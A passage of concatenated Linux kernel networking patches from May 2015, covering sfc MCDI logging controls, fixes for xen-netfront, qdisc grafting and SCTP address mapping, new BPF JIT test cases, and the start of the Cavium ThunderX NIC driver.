diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c index 9eafa39d0e7f..2d4853c032c3 100644 --- a/drivers/net/ethernet/sfc/efx.c +++ b/drivers/net/ethernet/sfc/efx.c @@ -2326,6 +2326,28 @@ show_phy_type(struct device *dev, struct device_attribute *attr, char *buf) } static DEVICE_ATTR(phy_type, 0444, show_phy_type, NULL); +#ifdef CONFIG_SFC_MCDI_LOGGING +static ssize_t show_mcdi_log(struct device *dev, struct device_attribute *attr, + char *buf) +{ + struct efx_nic *efx = pci_get_drvdata(to_pci_dev(dev)); + struct efx_mcdi_iface *mcdi = efx_mcdi(efx); + + return scnprintf(buf, PAGE_SIZE, "%d\n", mcdi->logging_enabled); +} +static ssize_t set_mcdi_log(struct device *dev, struct device_attribute *attr, + const char *buf, size_t count) +{ + struct efx_nic *efx = pci_get_drvdata(to_pci_dev(dev)); + struct efx_mcdi_iface *mcdi = efx_mcdi(efx); + bool enable = count > 0 && *buf != '0'; + + mcdi->logging_enabled = enable; + return count; +} +static DEVICE_ATTR(mcdi_logging, 0644, show_mcdi_log, set_mcdi_log); +#endif + static int efx_register_netdev(struct efx_nic *efx) { struct net_device *net_dev = efx->net_dev; @@ -2383,9 +2405,21 @@ static int efx_register_netdev(struct efx_nic *efx) "failed to init net dev attributes\n"); goto fail_registered; } +#ifdef CONFIG_SFC_MCDI_LOGGING + rc = device_create_file(&efx->pci_dev->dev, &dev_attr_mcdi_logging); + if (rc) { + netif_err(efx, drv, efx->net_dev, + "failed to init net dev attributes\n"); + goto fail_attr_mcdi_logging; + } +#endif return 0; +#ifdef CONFIG_SFC_MCDI_LOGGING +fail_attr_mcdi_logging: + device_remove_file(&efx->pci_dev->dev, &dev_attr_phy_type); +#endif fail_registered: rtnl_lock(); efx_dissociate(efx); @@ -2404,13 +2438,14 @@ static void efx_unregister_netdev(struct efx_nic *efx) BUG_ON(netdev_priv(efx->net_dev) != efx); - strlcpy(efx->name, pci_name(efx->pci_dev), sizeof(efx->name)); - device_remove_file(&efx->pci_dev->dev, &dev_attr_phy_type); - - rtnl_lock(); - unregister_netdevice(efx->net_dev); - efx->state = STATE_UNINIT; - rtnl_unlock(); + if (efx_dev_registered(efx)) { + strlcpy(efx->name, pci_name(efx->pci_dev), sizeof(efx->name)); +#ifdef CONFIG_SFC_MCDI_LOGGING + device_remove_file(&efx->pci_dev->dev, &dev_attr_mcdi_logging); +#endif + device_remove_file(&efx->pci_dev->dev, &dev_attr_phy_type); + unregister_netdev(efx->net_dev); + } } /************************************************************************** diff --git a/drivers/net/ethernet/sfc/mcdi.c b/drivers/net/ethernet/sfc/mcdi.c index 31eda3255966..dde7f901e16c 100644 --- a/drivers/net/ethernet/sfc/mcdi.c +++ b/drivers/net/ethernet/sfc/mcdi.c @@ -188,7 +188,7 @@ static void efx_mcdi_send_request(struct efx_nic *efx, unsigned cmd, } #ifdef CONFIG_SFC_MCDI_LOGGING - if (!WARN_ON_ONCE(!buf)) { + if (mcdi->logging_enabled && !WARN_ON_ONCE(!buf)) { int bytes = 0; int i; /* Lengths should always be a whole number of dwords, so scream @@ -274,7 +274,7 @@ static void efx_mcdi_read_response_header(struct efx_nic *efx) } #ifdef CONFIG_SFC_MCDI_LOGGING - if (!WARN_ON_ONCE(!buf)) { + if (mcdi->logging_enabled && !WARN_ON_ONCE(!buf)) { size_t hdr_len, data_len; int bytes = 0; int i; diff --git a/drivers/net/ethernet/sfc/mcdi.h b/drivers/net/ethernet/sfc/mcdi.h index b783a2dff80f..1838afe2da92 100644 --- a/drivers/net/ethernet/sfc/mcdi.h +++ b/drivers/net/ethernet/sfc/mcdi.h @@ -59,6 +59,7 @@ enum efx_mcdi_mode { * @async_list: Queue of asynchronous requests * @async_timer: Timer for asynchronous request timeout * @logging_buffer: buffer that may be 
used to build MCDI tracing messages + * @logging_enabled: whether to trace MCDI */ struct efx_mcdi_iface { struct efx_nic *efx; @@ -77,6 +78,7 @@ struct efx_mcdi_iface { struct timer_list async_timer; #ifdef CONFIG_SFC_MCDI_LOGGING char *logging_buffer; + bool logging_enabled; #endif }; From 42ca087fbfe4a961cd7ff09bbc31b3e17eabc06b Mon Sep 17 00:00:00 2001 From: Edward Cree Date: Wed, 27 May 2015 13:14:26 +0100 Subject: [PATCH 312/872] sfc: add module parameter to enable MCDI logging on new functions As many issues are encountered at probe time, where MCDI logging can't be enabled through the sysfs node, this change adds a module parameter 'mcdi_logging_default', which defaults to false. When set to true, newly-probed functions will have MCDI logging enabled. The setting can subsequently be changed as normal through the sysfs node. Signed-off-by: Edward Cree Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/mcdi.c | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/drivers/net/ethernet/sfc/mcdi.c b/drivers/net/ethernet/sfc/mcdi.c index dde7f901e16c..81640f8bb811 100644 --- a/drivers/net/ethernet/sfc/mcdi.c +++ b/drivers/net/ethernet/sfc/mcdi.c @@ -8,6 +8,7 @@ */ #include +#include #include #include "net_driver.h" #include "nic.h" @@ -54,6 +55,13 @@ static int efx_mcdi_drv_attach(struct efx_nic *efx, bool driver_operating, static bool efx_mcdi_poll_once(struct efx_nic *efx); static void efx_mcdi_abandon(struct efx_nic *efx); +#ifdef CONFIG_SFC_MCDI_LOGGING +static bool mcdi_logging_default; +module_param(mcdi_logging_default, bool, 0644); +MODULE_PARM_DESC(mcdi_logging_default, + "Enable MCDI logging on newly-probed functions"); +#endif + int efx_mcdi_init(struct efx_nic *efx) { struct efx_mcdi_iface *mcdi; @@ -71,6 +79,7 @@ int efx_mcdi_init(struct efx_nic *efx) mcdi->logging_buffer = (char *)__get_free_page(GFP_KERNEL); if (!mcdi->logging_buffer) goto fail1; + mcdi->logging_enabled = mcdi_logging_default; #endif init_waitqueue_head(&mcdi->wq); spin_lock_init(&mcdi->iface_lock); From ad0681185770716523c81b156c44b9804d7b8ed2 Mon Sep 17 00:00:00 2001 From: David Vrabel Date: Wed, 27 May 2015 15:46:10 +0100 Subject: [PATCH 313/872] xen-netfront: properly destroy queues when removing device xennet_remove() freed the queues before freeing the netdevice, which results in a use-after-free when free_netdev() tries to delete the napi instances that have already been freed. Fix this by fully destroying the queues (which includes deleting the napi instances) before freeing the netdevice. Signed-off-by: David Vrabel Reviewed-by: Boris Ostrovsky Signed-off-by: David S.
Miller --- drivers/net/xen-netfront.c | 15 ++------------- 1 file changed, 2 insertions(+), 13 deletions(-) diff --git a/drivers/net/xen-netfront.c b/drivers/net/xen-netfront.c index 3f45afd4382e..e031c943286e 100644 --- a/drivers/net/xen-netfront.c +++ b/drivers/net/xen-netfront.c @@ -1698,6 +1698,7 @@ static void xennet_destroy_queues(struct netfront_info *info) if (netif_running(info->netdev)) napi_disable(&queue->napi); + del_timer_sync(&queue->rx_refill_timer); netif_napi_del(&queue->napi); } @@ -2102,9 +2103,6 @@ static const struct attribute_group xennet_dev_group = { static int xennet_remove(struct xenbus_device *dev) { struct netfront_info *info = dev_get_drvdata(&dev->dev); - unsigned int num_queues = info->netdev->real_num_tx_queues; - struct netfront_queue *queue = NULL; - unsigned int i = 0; dev_dbg(&dev->dev, "%s\n", dev->nodename); @@ -2112,16 +2110,7 @@ static int xennet_remove(struct xenbus_device *dev) unregister_netdev(info->netdev); - for (i = 0; i < num_queues; ++i) { - queue = &info->queues[i]; - del_timer_sync(&queue->rx_refill_timer); - } - - if (num_queues) { - kfree(info->queues); - info->queues = NULL; - } - + xennet_destroy_queues(info); xennet_free_netdev(info->netdev); return 0; From bde28bc6ad0c575f8b4eebe8cd27e36d6c3b09c6 Mon Sep 17 00:00:00 2001 From: Daniel Borkmann Date: Tue, 26 May 2015 22:35:43 +0200 Subject: [PATCH 314/872] test_bpf: add similarly conflicting jump test case only for classic While 3b52960266a3 ("test_bpf: add more eBPF jump torture cases") added the int3 bug test case only for eBPF, which needs exactly 11 passes to converge, here's a version for classic BPF with 11 passes, and one that would need 70 passes on x86_64 to actually converge before being successfully JITed. Effectively, all jumps are being optimized out resulting in a JIT image of just 89 bytes (from originally max BPF insns), only returning K. Might be useful as a recipe for folks wanting to craft a test case when backporting the fix in commit 3f7352bf21f8 ("x86: bpf_jit: fix compilation of large bpf programs") while not having eBPF. The 2nd one is delegated to the interpreter as the last pass still results in shrinking; in other words, this one won't be JITed on x86_64. Signed-off-by: Daniel Borkmann Acked-by: Alexei Starovoitov Signed-off-by: David S. Miller --- lib/test_bpf.c | 57 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) diff --git a/lib/test_bpf.c b/lib/test_bpf.c index c07b8e7db330..7f58c735d745 100644 --- a/lib/test_bpf.c +++ b/lib/test_bpf.c @@ -314,6 +314,47 @@ static int bpf_fill_maxinsns10(struct bpf_test *self) return 0; } +static int __bpf_fill_ja(struct bpf_test *self, unsigned int len, + unsigned int plen) +{ + struct sock_filter *insn; + unsigned int rlen; + int i, j; + + insn = kmalloc_array(len, sizeof(*insn), GFP_KERNEL); + if (!insn) + return -ENOMEM; + + rlen = (len % plen) - 1; + + for (i = 0; i + plen < len; i += plen) + for (j = 0; j < plen; j++) + insn[i + j] = __BPF_JUMP(BPF_JMP | BPF_JA, + plen - 1 - j, 0, 0); + for (j = 0; j < rlen; j++) + insn[i + j] = __BPF_JUMP(BPF_JMP | BPF_JA, rlen - 1 - j, + 0, 0); + + insn[len - 1] = __BPF_STMT(BPF_RET | BPF_K, 0xababcbac); + + self->u.ptr.insns = insn; + self->u.ptr.len = len; + + return 0; +} + +static int bpf_fill_maxinsns11(struct bpf_test *self) +{ + /* Hits 70 passes on x86_64, so cannot get JITed there. */ + return __bpf_fill_ja(self, BPF_MAXINSNS, 68); +} + +static int bpf_fill_ja(struct bpf_test *self) +{ + /* Hits exactly 11 passes on x86_64 JIT.
*/ + return __bpf_fill_ja(self, 12, 9); +} + static struct bpf_test tests[] = { { "TAX", @@ -4252,6 +4293,14 @@ static struct bpf_test tests[] = { { }, { { 0, 1 } }, }, + { + "JMP_JA: Jump, gap, jump, ...", + { }, + CLASSIC | FLAG_NO_DATA, + { }, + { { 0, 0xababcbac } }, + .fill_helper = bpf_fill_ja, + }, { /* Mainly checking JIT here. */ "BPF_MAXINSNS: Maximum possible literals", { }, @@ -4335,6 +4384,14 @@ static struct bpf_test tests[] = { { { 0, 0xabababac } }, .fill_helper = bpf_fill_maxinsns10, }, + { + "BPF_MAXINSNS: Jump, gap, jump, ...", + { }, + CLASSIC | FLAG_NO_DATA, + { }, + { { 0, 0xababcbac } }, + .fill_helper = bpf_fill_maxinsns11, + }, }; static struct net_device dev; From 86e363dc3b50bfd50a1f315934583fbda673ab8d Mon Sep 17 00:00:00 2001 From: WANG Cong Date: Tue, 26 May 2015 16:08:48 -0700 Subject: [PATCH 315/872] net_sched: invoke ->attach() after setting dev->qdisc For mq qdisc, we add per tx queue qdisc to root qdisc for display purpose, however, that happens too early, before the new dev->qdisc is finally set, this causes q->list points to an old root qdisc which is going to be freed right before assigning with a new one. Fix this by moving ->attach() after setting dev->qdisc. For the record, this fixes the following crash: ------------[ cut here ]------------ WARNING: CPU: 1 PID: 975 at lib/list_debug.c:59 __list_del_entry+0x5a/0x98() list_del corruption. prev->next should be ffff8800d1998ae8, but was 6b6b6b6b6b6b6b6b CPU: 1 PID: 975 Comm: tc Not tainted 4.1.0-rc4+ #1019 Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 0000000000000009 ffff8800d73fb928 ffffffff81a44e7f 0000000047574756 ffff8800d73fb978 ffff8800d73fb968 ffffffff810790da ffff8800cfc4cd20 ffffffff814e725b ffff8800d1998ae8 ffffffff82381250 0000000000000000 Call Trace: [] dump_stack+0x4c/0x65 [] warn_slowpath_common+0x9c/0xb6 [] ? __list_del_entry+0x5a/0x98 [] warn_slowpath_fmt+0x46/0x48 [] ? dev_graft_qdisc+0x5e/0x6a [] __list_del_entry+0x5a/0x98 [] list_del+0xe/0x2d [] qdisc_list_del+0x1e/0x20 [] qdisc_destroy+0x30/0xd6 [] qdisc_graft+0x11d/0x243 [] tc_get_qdisc+0x1a6/0x1d4 [] ? mark_lock+0x2e/0x226 [] rtnetlink_rcv_msg+0x181/0x194 [] ? rtnl_lock+0x17/0x19 [] ? rtnl_lock+0x17/0x19 [] ? __rtnl_unlock+0x17/0x17 [] netlink_rcv_skb+0x4d/0x93 [] rtnetlink_rcv+0x26/0x2d [] netlink_unicast+0xcb/0x150 [] ? might_fault+0x59/0xa9 [] netlink_sendmsg+0x4fa/0x51c [] sock_sendmsg_nosec+0x12/0x1d [] sock_sendmsg+0x29/0x2e [] ___sys_sendmsg+0x1b4/0x23a [] ? native_sched_clock+0x35/0x37 [] ? sched_clock_local+0x12/0x72 [] ? sched_clock_cpu+0x9e/0xb7 [] ? current_kernel_time+0xe/0x32 [] ? lock_release_holdtime.part.29+0x71/0x7f [] ? read_seqcount_begin.constprop.27+0x5f/0x76 [] ? trace_hardirqs_on_caller+0x17d/0x199 [] ? __fget_light+0x50/0x78 [] __sys_sendmsg+0x42/0x60 [] SyS_sendmsg+0x12/0x1c [] system_call_fastpath+0x12/0x6f ---[ end trace ef29d3fb28e97ae7 ]--- For long term, we probably need to clean up the qdisc_graft() code in case it hides other bugs like this. Fixes: 95dc19299f74 ("pkt_sched: give visibility to mq slave qdiscs") Cc: Jamal Hadi Salim Signed-off-by: Cong Wang Acked-by: Eric Dumazet Signed-off-by: David S. 
Miller --- net/sched/sch_api.c | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c index ad9eed70bc8f..1e1c89e51a11 100644 --- a/net/sched/sch_api.c +++ b/net/sched/sch_api.c @@ -815,10 +815,8 @@ static int qdisc_graft(struct net_device *dev, struct Qdisc *parent, if (dev->flags & IFF_UP) dev_deactivate(dev); - if (new && new->ops->attach) { - new->ops->attach(new); - num_q = 0; - } + if (new && new->ops->attach) + goto skip; for (i = 0; i < num_q; i++) { struct netdev_queue *dev_queue = dev_ingress_queue(dev); @@ -834,12 +832,16 @@ static int qdisc_graft(struct net_device *dev, struct Qdisc *parent, qdisc_destroy(old); } +skip: if (!ingress) { notify_and_destroy(net, skb, n, classid, dev->qdisc, new); if (new && !new->ops->attach) atomic_inc(&new->refcnt); dev->qdisc = new ? : &noop_qdisc; + + if (new && new->ops->attach) + new->ops->attach(new); } else { notify_and_destroy(net, skb, n, classid, old, new); } From 9302d7bb0c5cd46be5706859301f18c137b2439f Mon Sep 17 00:00:00 2001 From: Jason Gunthorpe Date: Tue, 26 May 2015 17:30:17 -0600 Subject: [PATCH 316/872] sctp: Fix mangled IPv4 addresses on a IPv6 listening socket sctp_v4_map_v6 was subtly writing and reading from members of a union in a way that clobbered data it needed to read before it read it. Zeroing the v6 flowinfo overwrites the v4 sin_addr with 0, meaning that every place that calls sctp_v4_map_v6 gets ::ffff:0.0.0.0 as the result. Reorder things to guarantee correct behaviour no matter what the union layout is. This impacts user space clients that open an IPv6 SCTP socket and receive IPv4 connections. Prior to 299ee user space would see a sockaddr with AF_INET and a correct address, after 299ee the sockaddr is AF_INET6, but the address is wrong. Fixes: 299ee123e198 (sctp: Fixup v4mapped behaviour to comply with Sock API) Signed-off-by: Jason Gunthorpe Acked-by: Daniel Borkmann Acked-by: Neil Horman Signed-off-by: David S. Miller --- include/net/sctp/sctp.h | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/include/net/sctp/sctp.h b/include/net/sctp/sctp.h index c56a438c3a1e..ce13cf20f625 100644 --- a/include/net/sctp/sctp.h +++ b/include/net/sctp/sctp.h @@ -574,11 +574,14 @@ static inline void sctp_v6_map_v4(union sctp_addr *addr) /* Map v4 address to v4-mapped v6 address */ static inline void sctp_v4_map_v6(union sctp_addr *addr) { + __be16 port; + + port = addr->v4.sin_port; + addr->v6.sin6_addr.s6_addr32[3] = addr->v4.sin_addr.s_addr; + addr->v6.sin6_port = port; addr->v6.sin6_family = AF_INET6; addr->v6.sin6_flowinfo = 0; addr->v6.sin6_scope_id = 0; - addr->v6.sin6_port = addr->v4.sin_port; - addr->v6.sin6_addr.s6_addr32[3] = addr->v4.sin_addr.s_addr; addr->v6.sin6_addr.s6_addr32[0] = 0; addr->v6.sin6_addr.s6_addr32[1] = 0; addr->v6.sin6_addr.s6_addr32[2] = htonl(0x0000ffff); From e5c4708b2b6fec0300db60ee3cf4b4ae96430a12 Mon Sep 17 00:00:00 2001 From: Sunil Goutham Date: Tue, 26 May 2015 19:20:14 -0700 Subject: [PATCH 317/872] pci: Add Cavium PCI vendor id This vendor id will be used by network (vNIC), USB (xHCI), SATA (AHCI), GPIO, I2C, MMC and maybe other drivers for the ThunderX SoC. Acked-by: Bjorn Helgaas Signed-off-by: Sunil Goutham Signed-off-by: Aleksey Makarov Signed-off-by: David S.
Miller --- include/linux/pci_ids.h | 2 ++ 1 file changed, 2 insertions(+) diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h index 2f7b9a40f627..2972c7f3aa1d 100644 --- a/include/linux/pci_ids.h +++ b/include/linux/pci_ids.h @@ -2329,6 +2329,8 @@ #define PCI_DEVICE_ID_ALTIMA_AC9100 0x03ea #define PCI_DEVICE_ID_ALTIMA_AC1003 0x03eb +#define PCI_VENDOR_ID_CAVIUM 0x177d + #define PCI_VENDOR_ID_BELKIN 0x1799 #define PCI_DEVICE_ID_BELKIN_F5D7010V7 0x701f From 4863dea3fab01734768c9f7fc2c1590a8f1f6266 Mon Sep 17 00:00:00 2001 From: Sunil Goutham Date: Tue, 26 May 2015 19:20:15 -0700 Subject: [PATCH 318/872] net: Adding support for Cavium ThunderX network controller This patch adds support for the Cavium ThunderX network controller. The driver is on the pci bus and thus requires the Thunder PCIe host controller driver to be enabled. Signed-off-by: Maciej Czekaj Signed-off-by: David Daney Signed-off-by: Sunil Goutham Signed-off-by: Ganapatrao Kulkarni Signed-off-by: Aleksey Makarov Signed-off-by: Tomasz Nowicki Signed-off-by: Robert Richter Signed-off-by: Kamil Rytarowski Signed-off-by: Thanneeru Srinivasulu Signed-off-by: Sruthi Vangala Signed-off-by: David S. Miller --- MAINTAINERS | 7 + drivers/net/ethernet/Kconfig | 1 + drivers/net/ethernet/Makefile | 1 + drivers/net/ethernet/cavium/Kconfig | 40 + drivers/net/ethernet/cavium/Makefile | 5 + drivers/net/ethernet/cavium/thunder/Makefile | 11 + drivers/net/ethernet/cavium/thunder/nic.h | 414 +++++ .../net/ethernet/cavium/thunder/nic_main.c | 940 ++++++++++ drivers/net/ethernet/cavium/thunder/nic_reg.h | 213 +++ .../ethernet/cavium/thunder/nicvf_ethtool.c | 601 +++++++ .../net/ethernet/cavium/thunder/nicvf_main.c | 1332 ++++++++++++++ .../ethernet/cavium/thunder/nicvf_queues.c | 1544 +++++++++++++++++ .../ethernet/cavium/thunder/nicvf_queues.h | 381 ++++ .../net/ethernet/cavium/thunder/q_struct.h | 701 ++++++++ .../net/ethernet/cavium/thunder/thunder_bgx.c | 966 +++++++++++ .../net/ethernet/cavium/thunder/thunder_bgx.h | 223 +++ 16 files changed, 7380 insertions(+) create mode 100644 drivers/net/ethernet/cavium/Kconfig create mode 100644 drivers/net/ethernet/cavium/Makefile create mode 100644 drivers/net/ethernet/cavium/thunder/Makefile create mode 100644 drivers/net/ethernet/cavium/thunder/nic.h create mode 100644 drivers/net/ethernet/cavium/thunder/nic_main.c create mode 100644 drivers/net/ethernet/cavium/thunder/nic_reg.h create mode 100644 drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c create mode 100644 drivers/net/ethernet/cavium/thunder/nicvf_main.c create mode 100644 drivers/net/ethernet/cavium/thunder/nicvf_queues.c create mode 100644 drivers/net/ethernet/cavium/thunder/nicvf_queues.h create mode 100644 drivers/net/ethernet/cavium/thunder/q_struct.h create mode 100644 drivers/net/ethernet/cavium/thunder/thunder_bgx.c create mode 100644 drivers/net/ethernet/cavium/thunder/thunder_bgx.h diff --git a/MAINTAINERS b/MAINTAINERS index df106f87a3ba..d1b1d2294b6a 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -921,6 +921,13 @@ M: Krzysztof Halasa S: Maintained F: arch/arm/mach-cns3xxx/ +ARM/CAVIUM THUNDER NETWORK DRIVER +M: Sunil Goutham +M: Robert Richter +L: linux-arm-kernel@lists.infradead.org (moderated for non-subscribers) +S: Supported +F: drivers/net/ethernet/cavium/ + ARM/CIRRUS LOGIC CLPS711X ARM ARCHITECTURE M: Alexander Shiyan L: linux-arm-kernel@lists.infradead.org (moderated for non-subscribers) diff --git a/drivers/net/ethernet/Kconfig b/drivers/net/ethernet/Kconfig index eadcb053807e..9a8308553520 100644 --- 
a/drivers/net/ethernet/Kconfig +++ b/drivers/net/ethernet/Kconfig @@ -34,6 +34,7 @@ source "drivers/net/ethernet/adi/Kconfig" source "drivers/net/ethernet/broadcom/Kconfig" source "drivers/net/ethernet/brocade/Kconfig" source "drivers/net/ethernet/calxeda/Kconfig" +source "drivers/net/ethernet/cavium/Kconfig" source "drivers/net/ethernet/chelsio/Kconfig" source "drivers/net/ethernet/cirrus/Kconfig" source "drivers/net/ethernet/cisco/Kconfig" diff --git a/drivers/net/ethernet/Makefile b/drivers/net/ethernet/Makefile index 1367afcd0a8b..4395d99115a0 100644 --- a/drivers/net/ethernet/Makefile +++ b/drivers/net/ethernet/Makefile @@ -20,6 +20,7 @@ obj-$(CONFIG_NET_BFIN) += adi/ obj-$(CONFIG_NET_VENDOR_BROADCOM) += broadcom/ obj-$(CONFIG_NET_VENDOR_BROCADE) += brocade/ obj-$(CONFIG_NET_CALXEDA_XGMAC) += calxeda/ +obj-$(CONFIG_NET_VENDOR_CAVIUM) += cavium/ obj-$(CONFIG_NET_VENDOR_CHELSIO) += chelsio/ obj-$(CONFIG_NET_VENDOR_CIRRUS) += cirrus/ obj-$(CONFIG_NET_VENDOR_CISCO) += cisco/ diff --git a/drivers/net/ethernet/cavium/Kconfig b/drivers/net/ethernet/cavium/Kconfig new file mode 100644 index 000000000000..6365fb4242be --- /dev/null +++ b/drivers/net/ethernet/cavium/Kconfig @@ -0,0 +1,40 @@ +# +# Cavium ethernet device configuration +# + +config NET_VENDOR_CAVIUM + tristate "Cavium ethernet drivers" + depends on PCI + ---help--- + Enable support for the Cavium ThunderX Network Interface + Controller (NIC). The NIC provides the controller and DMA + engines to move network traffic to/from the memory. The NIC + works closely with TNS, BGX and SerDes to implement the + functions replacing and virtualizing those of a typical + standalone PCIe NIC chip. + + If you have a Cavium Thunder board, say Y. + +if NET_VENDOR_CAVIUM + +config THUNDER_NIC_PF + tristate "Thunder Physical function driver" + default NET_VENDOR_CAVIUM + select THUNDER_NIC_BGX + ---help--- + This driver supports Thunder's NIC physical function. + +config THUNDER_NIC_VF + tristate "Thunder Virtual function driver" + default NET_VENDOR_CAVIUM + ---help--- + This driver supports Thunder's NIC virtual function + +config THUNDER_NIC_BGX + tristate "Thunder MAC interface driver (BGX)" + default NET_VENDOR_CAVIUM + ---help--- + This driver supports programming and controlling of MAC + interface from NIC physical function driver. + +endif # NET_VENDOR_CAVIUM diff --git a/drivers/net/ethernet/cavium/Makefile b/drivers/net/ethernet/cavium/Makefile new file mode 100644 index 000000000000..7aac4780d050 --- /dev/null +++ b/drivers/net/ethernet/cavium/Makefile @@ -0,0 +1,5 @@ +# +# Makefile for the Cavium ethernet device drivers. +# + +obj-$(CONFIG_NET_VENDOR_CAVIUM) += thunder/ diff --git a/drivers/net/ethernet/cavium/thunder/Makefile b/drivers/net/ethernet/cavium/thunder/Makefile new file mode 100644 index 000000000000..5c4615ccaa14 --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/Makefile @@ -0,0 +1,11 @@ +# +# Makefile for Cavium's Thunder ethernet device +# + +obj-$(CONFIG_THUNDER_NIC_BGX) += thunder_bgx.o +obj-$(CONFIG_THUNDER_NIC_PF) += nicpf.o +obj-$(CONFIG_THUNDER_NIC_VF) += nicvf.o + +nicpf-y := nic_main.o +nicvf-y := nicvf_main.o nicvf_queues.o +nicvf-y += nicvf_ethtool.o diff --git a/drivers/net/ethernet/cavium/thunder/nic.h b/drivers/net/ethernet/cavium/thunder/nic.h new file mode 100644 index 000000000000..9b0be527909b --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/nic.h @@ -0,0 +1,414 @@ +/* + * Copyright (C) 2015 Cavium, Inc. 
+ * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#ifndef NIC_H +#define NIC_H + +#include +#include +#include "thunder_bgx.h" + +/* PCI device IDs */ +#define PCI_DEVICE_ID_THUNDER_NIC_PF 0xA01E +#define PCI_DEVICE_ID_THUNDER_PASS1_NIC_VF 0x0011 +#define PCI_DEVICE_ID_THUNDER_NIC_VF 0xA034 +#define PCI_DEVICE_ID_THUNDER_BGX 0xA026 + +/* PCI BAR nos */ +#define PCI_CFG_REG_BAR_NUM 0 +#define PCI_MSIX_REG_BAR_NUM 4 + +/* NIC SRIOV VF count */ +#define MAX_NUM_VFS_SUPPORTED 128 +#define DEFAULT_NUM_VF_ENABLED 8 + +#define NIC_TNS_BYPASS_MODE 0 +#define NIC_TNS_MODE 1 + +/* NIC priv flags */ +#define NIC_SRIOV_ENABLED BIT(0) + +/* Min/Max packet size */ +#define NIC_HW_MIN_FRS 64 +#define NIC_HW_MAX_FRS 9200 /* 9216 max packet including FCS */ + +/* Max pkinds */ +#define NIC_MAX_PKIND 16 + +/* Rx Channels */ +/* Receive channel configuration in TNS bypass mode + * Below is configuration in TNS bypass mode + * BGX0-LMAC0-CHAN0 - VNIC CHAN0 + * BGX0-LMAC1-CHAN0 - VNIC CHAN16 + * ... + * BGX1-LMAC0-CHAN0 - VNIC CHAN128 + * ... + * BGX1-LMAC3-CHAN0 - VNIC CHAN174 + */ +#define NIC_INTF_COUNT 2 /* Interfaces btw VNIC and TNS/BGX */ +#define NIC_CHANS_PER_INF 128 +#define NIC_MAX_CHANS (NIC_INTF_COUNT * NIC_CHANS_PER_INF) +#define NIC_CPI_COUNT 2048 /* No of channel parse indices */ + +/* TNS bypass mode: 1-1 mapping between VNIC and BGX:LMAC */ +#define NIC_MAX_BGX MAX_BGX_PER_CN88XX +#define NIC_CPI_PER_BGX (NIC_CPI_COUNT / NIC_MAX_BGX) +#define NIC_MAX_CPI_PER_LMAC 64 /* Max when CPI_ALG is IP diffserv */ +#define NIC_RSSI_PER_BGX (NIC_RSSI_COUNT / NIC_MAX_BGX) + +/* Tx scheduling */ +#define NIC_MAX_TL4 1024 +#define NIC_MAX_TL4_SHAPERS 256 /* 1 shaper for 4 TL4s */ +#define NIC_MAX_TL3 256 +#define NIC_MAX_TL3_SHAPERS 64 /* 1 shaper for 4 TL3s */ +#define NIC_MAX_TL2 64 +#define NIC_MAX_TL2_SHAPERS 2 /* 1 shaper for 32 TL2s */ +#define NIC_MAX_TL1 2 + +/* TNS bypass mode */ +#define NIC_TL2_PER_BGX 32 +#define NIC_TL4_PER_BGX (NIC_MAX_TL4 / NIC_MAX_BGX) +#define NIC_TL4_PER_LMAC (NIC_MAX_TL4 / NIC_CHANS_PER_INF) + +/* NIC VF Interrupts */ +#define NICVF_INTR_CQ 0 +#define NICVF_INTR_SQ 1 +#define NICVF_INTR_RBDR 2 +#define NICVF_INTR_PKT_DROP 3 +#define NICVF_INTR_TCP_TIMER 4 +#define NICVF_INTR_MBOX 5 +#define NICVF_INTR_QS_ERR 6 + +#define NICVF_INTR_CQ_SHIFT 0 +#define NICVF_INTR_SQ_SHIFT 8 +#define NICVF_INTR_RBDR_SHIFT 16 +#define NICVF_INTR_PKT_DROP_SHIFT 20 +#define NICVF_INTR_TCP_TIMER_SHIFT 21 +#define NICVF_INTR_MBOX_SHIFT 22 +#define NICVF_INTR_QS_ERR_SHIFT 23 + +#define NICVF_INTR_CQ_MASK (0xFF << NICVF_INTR_CQ_SHIFT) +#define NICVF_INTR_SQ_MASK (0xFF << NICVF_INTR_SQ_SHIFT) +#define NICVF_INTR_RBDR_MASK (0x03 << NICVF_INTR_RBDR_SHIFT) +#define NICVF_INTR_PKT_DROP_MASK BIT(NICVF_INTR_PKT_DROP_SHIFT) +#define NICVF_INTR_TCP_TIMER_MASK BIT(NICVF_INTR_TCP_TIMER_SHIFT) +#define NICVF_INTR_MBOX_MASK BIT(NICVF_INTR_MBOX_SHIFT) +#define NICVF_INTR_QS_ERR_MASK BIT(NICVF_INTR_QS_ERR_SHIFT) + +/* MSI-X interrupts */ +#define NIC_PF_MSIX_VECTORS 10 +#define NIC_VF_MSIX_VECTORS 20 + +#define NIC_PF_INTR_ID_ECC0_SBE 0 +#define NIC_PF_INTR_ID_ECC0_DBE 1 +#define NIC_PF_INTR_ID_ECC1_SBE 2 +#define NIC_PF_INTR_ID_ECC1_DBE 3 +#define NIC_PF_INTR_ID_ECC2_SBE 4 +#define NIC_PF_INTR_ID_ECC2_DBE 5 +#define NIC_PF_INTR_ID_ECC3_SBE 6 +#define NIC_PF_INTR_ID_ECC3_DBE 7 +#define NIC_PF_INTR_ID_MBOX0 8 +#define NIC_PF_INTR_ID_MBOX1 9 + +/* Global timer 
